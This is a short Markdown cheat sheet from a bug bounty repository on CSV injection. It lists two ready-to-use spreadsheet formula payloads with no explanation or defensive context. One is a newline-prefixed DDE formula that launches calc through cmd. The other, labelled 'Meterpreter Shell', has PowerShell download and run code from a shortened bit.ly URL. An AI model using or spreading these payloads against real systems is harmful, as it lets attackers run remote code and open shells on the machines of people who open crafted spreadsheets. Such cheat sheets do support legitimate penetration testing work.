bugbounty-cheatsheet/cheatsheets/csv-injection.md
2017-07-14 14:54:44 +01:00

13 lines
No EOL
155 B
Markdown

## CSV Injection
**Newline character**
```
%0A-3+3+cmd|' /C calc'!D2
```
**Meterpreter Shell**
```
=cmd|'/C powershell IEX(wget bit.ly/1X146m3)'!A0
```